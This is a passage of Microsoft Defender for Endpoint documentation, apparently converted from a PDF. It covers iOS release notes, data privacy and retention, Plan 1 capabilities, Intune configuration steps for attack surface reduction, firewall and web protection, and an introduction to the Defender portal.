platform on these types of devices. It can also provide Web Protection without setting
up a local VPN on the device. This gives end-users a seamless experience while still
being protected from phishing and other web-based attacks. For details, visit this
documentation
Microsoft Defender for Endpoint is now

Microsoft Defender in the App store
Microsoft Defender for Endpoint is now available as Microsoft Defender in the app
store. With this update, the app is available as preview for Consumers in the US region.
Based on how you log into the app with your work or personal account, you'll have
access to features for Microsoft Defender for Endpoint or to features for Microsoft
Defender for individuals. For more information, see this blog .
Vulnerability Management
On January 25, 2022, we announced the general availability of Vulnerability
management on Android and iOS. For more information, see the techcommunity post
here .
1.1.28250101
Integration with Tunnel - Microsoft Defender for Endpoint on iOS can now
integrate with Microsoft Tunnel, a VPN gateway solution to enable security and
connectivity in a single app. For more information, see Microsoft Tunnel Overview.
Zero-touch onboard for enrolled iOS devices enrolled through Microsoft Intune is
generally available. For more information, see Zero touch onboarding of Microsoft
Bug fixes.
1.1.24210103
Resolved internet connectivity issues on supervised devices. For more information,
see Deploy Defender for Endpoint on enrolled iOS devices.
Bug fixes.
1.1.23250104
Performance optimizations - Test battery performance with this version and let us
know your feedback.
Zero-touch onboard for enrolled iOS devices - With this version, the preview of
Zero-touch onboard for devices enrolled through Microsoft Intune has been
added. For more information, see this documentation for more details on setup
and configuration.
Privacy Controls - Configure privacy controls for phish alert report. For more
information, see Configure iOS features.
1.1.23010101
Bug fixes and performance improvements
Performance optimizations were made in this release. Test battery performance
with this version and let us know your feedback.
1.1.20240103
Device Health card - Device Health card notifies end-users about any pending
software updates.
Usability enhancements - End-users can now disable the Defender for Endpoint
VPN from the Microsoft Defender app itself. Prior to this update, end-users had to
disable VPN only from the Settings app.
Bug fixes.
1.1.20020101
UX Enhancements - Microsoft Defender for Endpoint has a new look.
Bug fixes.
1.1.17240101
Support for Mobile Application Management (MAM) via Intune is generally
available with this version. For more information, see Microsoft Defender for
Endpoint risk signals available for your App protection policies
Jailbreak Detection is generally available. For more information, see Setup
Conditional Access Policy based on device risk signals.
Auto-setup of VPN profile for enrolled devices via Microsoft Intune is generally
available. For more information, see Auto-Setup VPN profile for enrolled iOS
devices.
Bug fixes.
1.1.15140101
Jailbreak Detection is in preview. For more information, see Setup Conditional
Access Policy based on device risk signals.
Auto-setup of VPN profile is in preview for enrolled devices via Microsoft Intune.
For more information, see Auto-Setup VPN profile for enrolled iOS devices.
The Microsoft Defender ATP product name has now been updated to Microsoft
Defender for Endpoint in the app store.
Improved sign-in experience.
Bug fixes.
1.1.15010101
With this version, we're announcing support for iPadOS/iPad devices.
Bug fixes.
 Tip
Feedback

preview features
Article • 01/19/2024
Applies to:

The Defender for Endpoint service is constantly being updated to include new feature
enhancements and capabilities.
Learn about new features in the Defender for Endpoint preview release and be among
the first to try upcoming features by turning on the preview experience.
For more information on new capabilities that are generally available, see What's new in
What you need to know

When working with features in public preview, these features:
May have restricted or limited functionality. For example, the feature may only
apply to one platform.
Typically go through feature changes before they're generally available (GA).
Are fully supported by Microsoft.
May only be available in selected geographic regions or cloud environments. For
example, the feature may not exist in the government cloud.
Individual features in preview may have more usage and support restrictions. If so,
this information is typically noted in the feature documentation.
The preview versions are provided with a standard support level, and can be used
for production environments.
Turn on preview features

You'll have access to upcoming features that you can provide feedback on to help
improve the overall experience before features are generally available.
Turn on the preview experience setting to be among the first to try upcoming features.
1. In the navigation pane, select Settings > Endpoints > Advanced features >
Preview features.
2. Toggle the setting between On and Off and select Save preferences.
 Tip
 Tip
Feedback

Microsoft Defender for Endpoint data
storage and privacy
Article • 08/23/2023
Applies to:

Microsoft Defender for Business
This section covers some of the most frequently asked questions regarding privacy and
data handling for Defender for Endpoint.
７ Note
This article explains the data storage and privacy details related to Defender for
Endpoint and Defender for Business. For more information related to Defender for
Endpoint and other products and services like Microsoft Defender Antivirus and
Windows, see Microsoft Privacy Statement , and also Windows privacy FAQ .
What data does Microsoft Defender for

Endpoint collect?
Microsoft Defender for Endpoint will collect information from your configured devices
and store it in a customer-dedicated and segregated tenant specific to the service for
administration, tracking, and reporting purposes.
Information collected includes file data (file names, sizes, and hashes), process data
(running processes, hashes), registry data, network connection data (host IPs and ports),
and device details (device identifiers, names, and the operating system version).
Microsoft stores this data securely in Microsoft Azure and maintains it in accordance
with Microsoft privacy practices and Microsoft Trust Center policies .
This data enables Defender for Endpoint to:

Proactively identify indicators of attack (IOAs) in your organization
Generate alerts if a possible attack was detected
Provide your security operations with a view into devices, files, and URLs related to
threat signals from your network, enabling you to investigate and explore the
presence of security threats on the network.
Microsoft doesn't use your data for advertising.
Data protection and encryption

The Defender for Endpoint service utilizes state-of-the-art data protection technologies
which are based on Microsoft Azure infrastructure.
There are various aspects relevant to data protection that our service takes care of.
Encryption is one of the most critical aspects, and it includes data encryption at rest,
encryption in flight, and key management with Key Vault. For more information on other
technologies used by the Defender for Endpoint service, see Azure encryption overview.
In all scenarios, data is encrypted using 256-bit AES encryption at the minimum.
Data storage location

Defender for Endpoint operates in the Microsoft Azure data centers in the European
Union, the United Kingdom, the United States, or in Australia. Customer data collected
by the service may be stored in: (a) the geo-location of the tenant as identified during
provisioning or, (b) the geo-location as defined by the data storage rules of an online
service if this online service is used by Defender for Endpoint to process such data. For
more information, see Where your Microsoft 365 customer data is stored.
Customer data in pseudonymized form may also be stored in the central storage and
processing systems in the United States.
Select Need help? in the Microsoft Defender portal to contact Microsoft support about
provisioning Microsoft Defender XDR in a different data center location.
Data sharing for Microsoft Defender for

Endpoint
Microsoft Defender for Endpoint shares data, including customer data, among the
following Microsoft products, also licensed by the customer.
Microsoft Sentinel
Microsoft Tunnel for Mobile Application Management - Android
Is my data isolated from other customer data?

Yes, your data is isolated through access authentication and logical segregation based
on customer identifier. Each customer can only access data collected from its own
organization, and the generic data that Microsoft provides.
How does Microsoft prevent malicious insider

activities and abuse of high privilege roles?
Microsoft developers and administrators have, by design, been given sufficient
privileges to carry out their assigned duties to operate and evolve the service. Microsoft
deploys combinations of preventive, detective, and reactive controls including the
following mechanisms to help protect against unauthorized developer and/or
administrative activities:
Tight access control to sensitive data

Combinations of controls that greatly enhance independent detection of malicious
activity
Multiple levels of monitoring, logging, and reporting
Additionally, Microsoft conducts background verification checks of certain operations

personnel, and limits access to applications, systems, and network infrastructure in
proportion to the level of background verification. Operations personnel follow a formal
process when they are required to access a customer's account or related information in
the performance of their duties.
Access to data for services deployed in Microsoft Azure Government data centers is only
granted to operating personnel who have been screened and approved to handle data
that's subject to certain government regulations and requirements, such as FedRAMP,
NIST 800.171 (DIB), ITAR, IRS 1075, DoD L4, and CJIS.
Is data shared with other customers?

No. Customer data is isolated from other customers and isn't shared. However, threat
intelligence on the data resulting from Microsoft processing, and which doesn't contain
any customer-specific data, might be shared with other customers. Each customer can
only access data collected from its own organization and generic data that Microsoft
provides.
How long will Microsoft store my data? What is

Microsoft's data retention policy?
At service onboarding
Data from Microsoft Defender for Endpoint is retained for 180 days, visible across the
portal. However, in the advanced hunting investigation experience, it's accessible via a
query for a period of 30 days.
At contract termination or expiration

Your data will be kept and will be available to you while the license is under grace period
or suspended mode. At the end of this period, that data will be erased from Microsoft's
systems to make it unrecoverable, no later than 180 days from contract termination or
expiration.
Advanced Hunting data

Advanced hunting is a query-based threat-hunting tool that lets you explore up to 30
days of raw data.
Can Microsoft help us maintain regulatory

compliance?
Microsoft provides customers with detailed information about Microsoft's security and
compliance programs, including audit reports and compliance packages, to help them
assess Defender for Endpoint services against their own legal and regulatory
requirements. Defender for Endpoint has achieved a number of certifications including
ISO, SOC, FedRAMP High, and PCI and continues to pursue additional national, regional,
and industry-specific certifications.
By providing customers with compliant, independently verified services, Microsoft

makes it easier for them to achieve compliance for the infrastructure and applications
they run.
For more information on the Defender for Endpoint certification reports, see Microsoft
Trust Center .
 Tip
Feedback

Overview of Microsoft Defender for
Endpoint Plan 1
Article • 12/01/2023
Applies to

help organizations like yours to prevent, detect, investigate, and respond to advanced
threats. We are pleased to announce that Defender for Endpoint is now available in two
plans:
Defender for Endpoint Plan 1, described in this article; and

Defender for Endpoint Plan 2, generally available, and formerly known as
The green boxes in the following image depict what's included in Defender for Endpoint
Plan 1:
Use this guide to:
Get an overview of what's included in Defender for Endpoint Plan 1

Learn how to set up and configure Defender for Endpoint Plan 1
Get started using the Microsoft Defender portal, where you can view incidents and
alerts, manage devices, and use reports about detected threats
Get an overview of maintenance and operations
Defender for Endpoint Plan 1 capabilities

Defender for Endpoint Plan 1 includes the following capabilities:
Next-generation protection that includes industry-leading, robust antimalware

and antivirus protection
Manual response actions, such as sending a file to quarantine, that your security
team can take on devices or files when threats are detected
Attack surface reduction capabilities that harden devices, prevent zero-day
attacks, and offer granular control over endpoint access and behaviors
Centralized configuration and management with the Microsoft Defender portal
and integration with Microsoft Intune
Protection for a variety of platforms, including Windows, macOS, iOS, and
Android devices
The following sections provide more details about these capabilities.
Next-generation protection includes robust antivirus and antimalware protection. With
next-generation protection, you get:
Behavior-based, heuristic, and real-time antivirus protection

Cloud-delivered protection, which includes near-instant detection and blocking of
new and emerging threats
Dedicated protection and product updates, including updates related to Microsoft
Defender Antivirus
To learn more, see Next-generation protection overview.
Manual response actions

Manual response actions are actions that your security team can take when threats are
detected on endpoints or in files. Defender for Endpoint includes certain manual
response actions that can be taken on a device that is detected as potentially
compromised or has suspicious content. You can also run response actions on files that
are detected as threats. The following table summarizes the manual response actions
that are available in Defender for Endpoint Plan 1.
ﾉ Expand table
File/Device Action Description
Device Run antivirus Starts an antivirus scan. If any threats are detected on the
scan device, those threats are often addressed during an antivirus
scan.
Device Isolate device Disconnects a device from your organization's network while
retaining connectivity to Defender for Endpoint. This action
enables you to monitor the device and take further action if
needed.
File Add an indicator Block indicators prevent portable executable files from being
to block or allow read, written, or executed on devices.
a file Allow indicators prevent files from being blocked or
remediated.
To learn more, see the following articles:
Take response actions on devices

Take response actions on files

Your organization's attack surfaces are all the places where you're vulnerable to
cyberattacks. With Defender for Endpoint Plan 1, you can reduce your attack surfaces by
protecting the devices and applications that your organization uses. The attack surface
reduction capabilities that are included in Defender for Endpoint Plan 1 are described in
the following sections.
Attack surface reduction rules

Ransomware mitigation
Device control
Web protection
Network protection
Network firewall
Application control
To learn more about attack surface reduction capabilities in Defender for Endpoint, see
Overview of attack surface reduction.
Attack surface reduction rules target certain software behaviors that are considered
risky. Such behaviors include:
Launching executable files and scripts that attempt to download or run other files
Running obfuscated or otherwise suspicious scripts
Initiating behaviors that apps don't usually initiate during normal work
Legitimate business applications can exhibit such software behaviors; however, these
behaviors are often considered risky because they are commonly abused by attackers
through malware. Attack surface reduction rules can constrain risky behaviors and help
keep your organization safe.
To learn more, see Use attack surface reduction rules to prevent malware infection.
With controlled folder access, you get ransomware mitigation. Controlled folder access
allows only trusted apps to access protected folders on your endpoints. Apps are added
to the trusted apps list based on their prevalence and reputation. Your security
operations team can add or remove apps from the trusted apps list, too.
To learn more, see Protect important folders with controlled folder access.
Device control
Sometimes threats to your organization's devices come in the form of files on
removable drives, such as USB drives. Defender for Endpoint includes capabilities to
help prevent threats from unauthorized peripherals from compromising your devices.
You can configure Defender for Endpoint to block or allow removable devices and files
on removable devices.
To learn more, see Control USB devices and removable media.
Web protection
With web protection, you can protect your organization's devices from web threats and
unwanted content. Web protection includes web threat protection and web content
filtering.
Web threat protection prevents access to phishing sites, malware vectors, exploit
sites, untrusted or low-reputation sites, and sites that you explicitly block.
Web content filtering prevents access to certain sites based on their category.
Categories can include adult content, leisure sites, legal liability sites, and more.
To learn more, see web protection.
Network protection
With network protection, you can prevent your organization from accessing dangerous
domains that might host phishing scams, exploits, and other malicious content on the
Internet.
To learn more, see Protect your network.
Network firewall
With network firewall protection, you can set rules that determine which network traffic
is permitted to flow to or from your organization's devices. With your network firewall
and advanced security that you get with Defender for Endpoint, you can:
Reduce the risk of network security threats

Safeguard sensitive data and intellectual property
Extend your security investment
To learn more, see Windows Defender Firewall with advanced security.
Application control
Application control protects your Windows endpoints by running only trusted
applications and code in the system core (kernel). Your security team can define
application control rules that consider an application's attributes, such as its codesigning
certificates, reputation, launching process, and more. Application control is available in
Windows 10 or later.
To learn more, see Application control for Windows.
Centralized management
Defender for Endpoint Plan 1 includes the Microsoft Defender portal, which enables
your security team to view current information about detected threats, take appropriate
actions to mitigate threats, and centrally manage your organization's threat protection
settings.
To learn more, see Microsoft Defender portal overview.
Role-based access control

Using role-based access control (RBAC), your security administrator can create roles and
groups to grant appropriate access to the Microsoft Defender portal
(https://security.microsoft.com ). With RBAC, you have fine-grained control over who
can access the Defender for Cloud, and what they can see and do.
To learn more, see Manage portal access using role-based access control.
Reporting
The Microsoft Defender portal (https://security.microsoft.com ) provides easy access to
information about detected threats and actions to address those threats.
The Home page includes cards to show at a glance which users or devices are at
risk, how many threats were detected, and what alerts/incidents were created.
The Incidents & alerts section lists any incidents that were created as a result of
triggered alerts. Alerts and incidents are generated as threats are detected across
devices.
The Action center lists remediation actions that were taken. For example, if a file is
sent to quarantine, or a URL is blocked, each action is listed in the Action center on
the History tab.
The Reports section includes reports that show threats detected and their status.
To learn more, see Get started with Microsoft Defender for Endpoint Plan 1.
APIs
With the Defender for Endpoint APIs, you can automate workflows and integrate with
your organization's custom solutions.
To learn more, see Defender for Endpoint APIs.
Cross-platform support
Most organizations use various devices and operating systems. Defender for Endpoint
Plan 1 supports the following operating systems:
Windows 10 and 11
Windows 7 (ESU required) Pro or Enterprise
Windows 8.1 Pro, Enterprise, and Pro Education
macOS (the three most recent releases are supported)
iOS
Android OS
Servers require an additional license, such as:
Microsoft Defender for Servers Plan 1 or Plan 2 (recommended for enterprise

customers) as part of the Defender for Cloud offering. To learn more. see Overview
of Microsoft Defender for Servers.
Microsoft Defender for Endpoint for Servers (recommended for enterprise
customers). To learn more, see Defender for Endpoint onboarding Windows Server.
Microsoft Defender for Business servers (for small and medium-sized businesses
who have Microsoft Defender for Business). To learn more, see How to get Microsoft
Defender for Business servers.
See Microsoft licensing and product terms .
Next steps
Set up and configure Defender for Endpoint Plan 1
Get started with Defender for Endpoint Plan 1
Manage Defender for Endpoint Plan 1
Learn about exclusions for Microsoft Defender for Endpoint and Microsoft
Defender Antivirus
 Tip
Feedback

Set up and configure Microsoft
Defender for Endpoint Plan 1
Article • 09/13/2023
Applies to:

This article describes how to set up and configure Defender for Endpoint Plan 1.
Whether you have assistance or are doing it yourself, you can use this article as a guide
throughout your deployment.
The setup and configuration process
The general setup and configuration process for Defender for Endpoint Plan 1 is as
follows:
ﾉ Expand table
Number Step Description
1 Review the requirements Lists licensing, browser, operating system, and datacenter
requirements
2 Plan your deployment Lists several deployment methods to consider and

includes links to more resources to help you decide which
Number Step Description
method to use
3 Set up your tenant Lists tasks for setting up your tenant environment
environment
4 Assign roles and Lists roles and permissions to consider for your security
permissions team
TIP: As soon as roles and permissions are assigned, your

security team can get started using the Microsoft Defender
portal. To learn more, see Getting started.
5 Onboard to Defender for Lists several methods by operating system to onboard to

Endpoint Defender for Endpoint Plan 1 and includes links to more
detailed information for each method
6 Configure next- Describes how to configure your next-generation

generation protection protection settings in Microsoft Intune
7 Configure your attack Lists the types of attack surface reduction capabilities you
surface reduction can configure and includes procedures with links to more
capabilities resources
Review the requirements

The following table lists the basic requirements for Defender for Endpoint Plan 1:
ﾉ Expand table
Requirement Description
Licensing requirements Defender for Endpoint Plan 1 (standalone, or as part of Microsoft 365
E3 or A3)
Browser requirements Microsoft Edge

Internet Explorer version 11
Google Chrome
Operating systems Windows 11

(client) Windows 10, version 1709, or later
macOS
iOS
Android OS
Operating systems Windows Server 2022

(server) Windows Server 2019
Windows Server version 1803 and later

Windows Server 2016 and 2012 R2 are supported when using the
modern unified solution
Linux Server
Datacenter One of the following datacenter locations:

- European Union
- United Kingdom
- United States
７ Note
The standalone version of Defender for Endpoint Plan 1 doesn't include server
licenses. To onboard servers, you'll require an additional license, such as:
Microsoft Defender for Servers Plan 1 or Plan 2 (as part of the Defender for
Cloud) offering.
Microsoft Defender for Endpoint for Servers
Microsoft Defender for Business servers (for small and medium-sized
businesses)
To learn more. see Defender for Endpoint onboarding Windows Server
Plan your deployment

When you plan your deployment, you can choose from several different architectures
and deployment methods. Every organization is unique, so you have several options to
consider, as listed in the following table:
ﾉ Expand table
Method Description
Intune Use Intune to manage endpoints in a cloud native

environment
Intune and Configuration Use Intune and Configuration Manager to manage endpoints
Manager and workloads that span an on-premises and cloud
environment
Method Description
Configuration Manager Use Configuration Manager to protect on-premises endpoints

with the cloud-based power of Defender for Endpoint
Local script downloaded from the Use local scripts on endpoints to run a pilot or onboard just a
Microsoft Defender portal few devices
To learn more about your deployment options, see Plan your Defender for Endpoint
deployment. And, download the following poster:
Get the deployment poster
 Tip
For more detailed information about planning your deployment, see Plan your
Microsoft Defender for Endpoint deployment.
Set up your tenant environment
Setting up your tenant environment includes tasks, such as:
Verifying your licenses

Configuring your tenant
Configuring your proxy settings (only if necessary)
Making sure sensors are working correctly and reporting data to Defender for
Endpoint
These tasks are included in the setup phase for Defender for Endpoint. See Set up
Assign roles and permissions

In order to access the Microsoft Defender portal, configure settings for Defender for
Endpoint, or perform tasks, such as taking response actions on detected threats,
appropriate permissions must be assigned. Defender for Endpoint uses built-in roles
within Microsoft Entra ID.
Microsoft recommends assigning users only the level of permission they need to
perform their tasks. You can assign permissions by using basic permissions
management, or by using role-based access control (RBAC).
With basic permissions management, global admins and security admins have full
access, whereas security readers read-only access.
With RBAC, you can set more granular permissions through more roles. For
example, you can have security readers, security operators, security admins,
endpoint administrators, and more.
The following table describes key roles to consider for Defender for Endpoint in your
organization:
ﾉ Expand table
Role Description
Global administrators Global admins can perform all kinds of tasks. The person who signed
(also referred to as up your company for Microsoft 365 or for Microsoft Defender for
global admins) Endpoint Plan 1 is a global administrator by default.
As a best practice, limit Global admins are able to access/change settings across all Microsoft
365 portals, such as:
Role Description
the number of global - The Microsoft 365 admin center (https://admin.microsoft.com )

administrators. - Microsoft Defender portal (https://security.microsoft.com )
- Intune admin center (https://endpoint.microsoft.com )
Security administrators Security admins can perform security operator tasks plus the following
(also referred to as tasks:
security admins) - Monitor security-related policies
- Manage security threats and alerts
- View reports
Security operator Security operators can perform security reader tasks plus the following
tasks:
- View information about detected threats
- Investigate and respond to detected threats
Security reader Security readers can perform the following tasks:

- View security-related policies across Microsoft 365 services
- View security threats and alerts
- View reports
 Tip
To learn more about roles in Microsoft Entra ID, see Assign administrator and non-
administrator roles to users with Microsoft Entra ID. And, more information about
roles for Defender for Endpoint, see Role-based access control.
Onboard to Defender for Endpoint

When you're ready to onboard your organization's endpoints, you can choose from
several methods, as listed in the following table:
ﾉ Expand table
Endpoint Deployment tool
Windows Local script (up to 10 devices)

Group Policy
Microsoft Intune/ Mobile Device Manager
Microsoft Endpoint Configuration Manager
VDI scripts
macOS Local script

Microsoft Intune
JAMF Pro
Mobile Device Management
Android Microsoft Intune
iOS Microsoft Intune

Mobile Application Manager
Then, proceed to configure your next-generation protection and attack surface

reduction capabilities.
Configure next-generation protection

We recommend using Intune to manage your organization's devices and security
settings, as shown in the following image:
To configure your next-generation protection in Intune, follow these steps:
1. Go to the Intune admin center (https://endpoint.microsoft.com ) and sign in.
2. Select Endpoint security > Antivirus, and then select an existing policy. (If you
don't have an existing policy, create a new policy.)
3. Set or change your antivirus configuration settings. Need help? Refer to the
following resources:
Settings for Windows 10 Microsoft Defender Antivirus policy in Microsoft

Intune
Configure Defender for Endpoint on iOS features
4. When you're finished specifying your settings, choose Review + save.
Configure your attack surface reduction

capabilities
Attack surface reduction is all about reducing the places and ways your organization is
open to attack. Defender for Endpoint Plan 1 includes several features and capabilities
to help you reduce your attack surfaces across your endpoints. These features and
capabilities are listed in the following table:
ﾉ Expand table
Feature/capability Description
Attack surface Configure attack surface reduction rules to constrain software-based risky
reduction rules behaviors and help keep your organization safe. Attack surface reduction
rules target certain software behaviors, such as
- Launching executable files and scripts that attempt to download or run
files
- Running obfuscated or otherwise suspicious scripts
- Performing behaviors that apps don't usually initiate during normal day-
to-day work
Such software behaviors are sometimes seen in legitimate applications.

However, these behaviors are often considered risky because they're
commonly abused by attackers through malware.
Ransomware Set up ransomware mitigation by configuring controlled folder access,

mitigation which helps protect your organization's valuable data from malicious apps
and threats, such as ransomware.
Device control Configure device control settings for your organization to allow or block
removable devices (such as USB drives).
Network protection Set up network protection to prevent people in your organization from
using applications that access dangerous domains or malicious content
on the Internet.
Web protection Set up web threat protection to protect your organization's devices from
phishing sites, exploit sites, and other untrusted or low-reputation sites.
Set up web content filtering to track and regulate access to websites
based on their content categories (such as Leisure, High bandwidth, Adult
content, or Legal liability).
Network firewall Configure your network firewall with rules that determine which network
traffic is permitted to come into or go out from your organization's
Feature/capability Description
devices.
Application control Configure application control rules if you want to allow only trusted
applications and processes to run on your Windows devices.

Attack surface reduction rules are available on devices running Windows. We
recommend using Intune, as shown in the following image:
2. Choose Endpoint security > Attack surface reduction > + Create policy.
3. For Platform, select Windows 10 and later.
4. For Profile, select Attack surface reduction rules, and then choose Create.
5. On the Basics tab, specify a name and description for the policy, and then choose
Next.
6. On the Configuration settings tab, expand Attack Surface Reduction Rules.
7. Specify settings for each rule, and then choose Next. (For more information about
what each rule does, see Attack surface reduction rules.)
8. On the Scope tags tab, if your organization is using scope tags, choose + Select
scope tags, and then select the tags you want to use. Then, choose Next.
To learn more about scope tags, see Use role-based access control (RBAC) and
scope tags for distributed IT.
9. On the Assignments tab, specify the users and groups to whom your policy should
be applied, and then choose Next. (To learn more about assignments, see Assign
user and device profiles in Microsoft Intune.)
10. On the Review + create tab, review the settings, and then choose Create.
 Tip
To learn more about attack surface reduction rules, see the following resources:
Use attack surface reduction rules to prevent malware infection

View the list of attack surface reduction rules
Attack surface reduction rules deployment Step 3: Implement attack surface
reduction rules
You get ransomware mitigation through controlled folder access, which allows only
trusted apps to access protected folders on your endpoints.
We recommend using Intune to configure controlled folder access.
2. Select Endpoint Security, and then select Attack Surface Reduction.

3. Choose + Create Policy.
4. For Platform, select Windows 10 and later, and for Profile, select Attack surface
reduction rules. Then choose Create.
5. On the Basics tab, name the policy and add a description. Select Next.
6. On the Configuration settings tab, in the Attack Surface Reduction Rules section,
scroll down to the bottom. In the Enable folder protection drop-down, select
Enable. You can optionally specify these other settings:
Next to List of additional folders that need to be protected, select the drop-
down menu, and then add folders that need to be protected.
Next to List of apps that have access to protected folders, select the drop-
down menu, and then add apps that should have access to protected folders.
Next to Exclude files and paths from attack surface reduction rules, select
the drop-down menu, and then add the files and paths that need to be
excluded from attack surface reduction rules.
Then choose Next.
8. On the Assignments tab, select Add all users and + Add all devices, and then
choose Next. (You can alternately specify specific groups of users or devices.)
9. On the Review + create tab, review the settings for your policy, and then choose
Create. The policy will be applied to any endpoints that were onboarded to
Defender for Endpoint shortly.
Device control
You can configure Defender for Endpoint to block or allow removable devices and files
on removable devices. We recommend using Intune to configure your device control
settings.

2. Select Devices > Configuration profiles > Create profile.
3. For Platform, select Windows 10 and later, and for Profile type, select Templates.
Under Template name, select Administrative Templates, and then choose Create.
5. On the Configuration settings tab, select All Settings. Then in the search box, type
Removable to see all the settings that pertain to removable devices.
6. Select an item in the list, such as All Removable Storage classes: Deny all access,
to open its flyout pane. The flyout for each setting explains what happens when it
is enabled, disabled, or not configured. Select a setting, and then choose OK.
7. Repeat step 6 for each setting that you want to configure. Then choose Next.
 Tip
For more information, see How to control USB devices and other removable
media using Microsoft Defender for Endpoint.
Network protection
With network protection, you can help protect your organization against dangerous
domains that might host phishing scams, exploits, and other malicious content on the
Internet. We recommend using Intune to turn on network protection.
2. Select Devices > Configuration profiles > Create profile.
3. For Platform, select Windows 10 and later, and for Profile type, select Templates.
Under Template name, select Endpoint protection, and then choose Create.
5. On the Configuration settings tab, expand Microsoft Defender Exploit Guard, and
then expand Network filtering.
Set Network protection to Enable. (You can alternately choose Audit to see how
network protection will work in your environment at first.)
Then choose Next.

7. On the Applicability Rules tab, set up a rule. The profile you are configuring will be
applied only to devices that meet the combined criteria you specify.
For example, you might choose to assign the policy to endpoints that are running
a certain OS edition only.
Then choose Next.
 Tip
You can use other methods, such as Windows PowerShell or Group Policy, to enable
network protection. To learn more, see Turn on network protection.
Web protection
With web protection, you can protect your organization's devices from web threats and
unwanted content. Your web protection includes web threat protection and web content
filtering. Configure both sets of capabilities. We recommend using Intune to configure
your web protection settings.
Configure web threat protection

1. Go to the Intune admin center (https://endpoint.microsoft.com ), and sign in.
2. Choose Endpoint security > Attack surface reduction, and then choose + Create
policy.
3. Select a platform, such as Windows 10 and later, select the Web protection profile,
and then choose Create.
4. On the Basics tab, specify a name and description, and then choose Next.
5. On the Configuration settings tab, expand Web Protection, specify the settings in
the following table, and then choose Next.
ﾉ Expand table
Setting Recommendation
Enable network Set to Enabled. Prevents users from visiting malicious sites or
protection domains.
Alternately, you can set network protection to Audit mode to see

how it will work in your environment. In audit mode, network
protection does not prevent users from visiting sites or domains,
but it does track detections as events.
Require Set to Yes. Helps protect users from potential phishing scams and
SmartScreen for malicious software.
Microsoft Edge
Legacy
Block malicious site Set to Yes. Prevents users from bypassing warnings about
access potentially malicious sites.
Block unverified file Set to Yes. Prevents users from bypassing the warnings and
download downloading unverified files.
7. On the Assignments tab, specify the users and devices to receive the web
protection policy, and then choose Next.
8. On the Review + create tab, review your policy settings, and then choose Create.
 Tip
To learn more about web threat protection, see Protect your organization against
web threats.
Configure web content filtering
1. Go to the Microsoft Defender portal (https://security.microsoft.com/ ) and sign

in.
2. Choose Settings > Endpoints.

3. Under Rules, choose Web content filtering, and then choose + Add policy.
4. In the Add policy flyout, on the General tab, specify a name for your policy, and
then choose Next.
5. On the Blocked categories, select one or more categories that you want to block,
and then choose Next.
6. On the Scope tab, select the device groups you want to receive this policy, and
then choose Next.
7. On the Summary tab, review your policy settings, and then choose Save.
 Tip
To learn more about configuring web content filtering, see Web content filtering.
Network firewall
Network firewall helps reduce the risk of network security threats. Your security team
can set rules that determine which traffic is permitted to flow to or from your
organization's devices. We recommend using Intune to configure your network firewall.
To configure basic firewall settings, follow these steps:
1. Go to the Intune admin center (https://endpoint.microsoft.com ), and sign in.
2. Choose Endpoint security > Firewall, and then choose + Create Policy.
3. Select a platform, such as Windows 10 and later, select the Microsoft Defender
Firewall profile, and then choose Create.
5. Expand Microsoft Defender Firewall, and then scroll down to the bottom of the
list.
6. Set each of the following settings to Yes:
Turn on Microsoft Defender Firewall for domain networks

Turn on Microsoft Defender Firewall for private networks
Turn on Microsoft Defender Firewall for public networks
Review the list of settings under each of domain networks, private networks, and
public networks. You can leave them set to Not configured, or change them to suit
your organization's needs.
Then choose Next.
 Tip
Firewall settings are detailed and can seem complex. Refer to Best practices for
configuring Windows Defender Firewall.
Application control
Windows Defender Application Control (WDAC) helps protect your Windows endpoints
by only allowing trusted applications and processes to run. Most organizations used a
phased deployment of WDAC. That is, most organizations don't roll out WDAC across all
Windows endpoints at first. In fact, depending on whether your organization's Windows
endpoints are fully managed, lightly managed, or "Bring Your Own Device" endpoints,
you might deploy WDAC on all or some endpoints.
To help with planning your WDAC deployment, see the following resources:
Application Control for Windows
Windows Defender Application Control policy design decisions
Windows Defender Application Control deployment in different scenarios: types of

devices
Next steps
Now that you have gone through the setup and configuration process, your next step is
to get started using Defender for Endpoint.
Get started with Defender for Endpoint Plan 1
 Tip
Feedback

Get started with Microsoft Defender for
Endpoint Plan 1
Article • 11/15/2023
Applies to:

The Microsoft Defender portal (https://security.microsoft.com ) enables you to view

information about detected threats, manage your alerts and incidents, take any needed
action on detected threats, and manage devices. The Microsoft Defender portal is where
you can get started interacting with the threat protection capabilities you get with
Defender for Endpoint Plan 1. The following sections describe how to get started:
The Microsoft Defender portal

Viewing and managing incidents & alerts
Managing devices
Viewing reports
The Microsoft Defender portal

The Microsoft Defender portal (https://security.microsoft.com ) is where you view
alerts, manage devices, and view reports. When you sign into the Microsoft Defender
portal, you start with the Home page, which resembles the following image:

The Home page provides your security team with a snapshot aggregate view of alerts,
device status, and threats detected. Microsoft Defender XDR is set up so that your
security operations team can find the information they're looking for quickly and easily.
７ Note
Our examples shown in this article might differ from what you see in your Microsoft
Defender portal. What you see in your portal depends on your licenses and
permissions. In addition, your security team can customize your organization's
portal by adding, removing, and rearranging cards.
Cards highlight key information and include

recommendations
The Home page includes cards, such as the Active incidents card shown in the following
image:
The card provides you with information at a glance, along with a link or button that you
can select to view more detailed information. Referring to our example Active incidents
card, we can select View all incidents to navigate to our list of incidents.

Navigation bar makes it easy to find alerts, the Action

center, and more
The navigation bar on the left side of the screen enables you to move easily between
incidents, alerts, the Action center, reports, and settings. The following table describes
the navigation bar.
ﾉ Expand table
Navigation bar item Description
Home Navigates to the Home page of the Microsoft Defender portal.
Incidents & alerts Expands to show Incidents and Alerts.
Incidents & alerts > Navigates to the Incidents list. Incidents are created when alerts are
Incidents triggered and/or threats are detected. By default, the Incidents list
displays data for the last 30 days, with the most recent incident listed
first.
To learn more, see Incidents.
Incidents & alerts > Navigates to the Alerts list (also referred to as the Alerts queue). Alerts
Alerts are triggered when a suspicious or malicious file, process, or behavior is
detected. By default, the Alerts list displays data for the last 30 days,
with the most recent alert listed first.
To learn more, see Alerts.
Incidents & alerts > If your subscription includes Microsoft Defender for Office 365, alerts
Email & collaboration are generated when potential threats are detected in email and Office
Navigation bar item Description
alerts files.
Actions & submissions Navigates to the Action center, which tracks remediation and manual
> Action center response actions. The Action center tracks activities like these:
- Microsoft Defender Antivirus encounters a malicious file and then
blocks/removes that file.
- Your security team isolates a device.
- Defender for Endpoint detects and quarantines a file.
To learn more, see Action center.
Actions & submissions Navigates to the unified submissions portal, where admins can submit
> Submissions files to Microsoft for review.
To learn more, see Submit files in Microsoft Defender for Endpoint.
Secure score Displays a representation of your organization's security posture along

with a list of recommended actions and metrics.
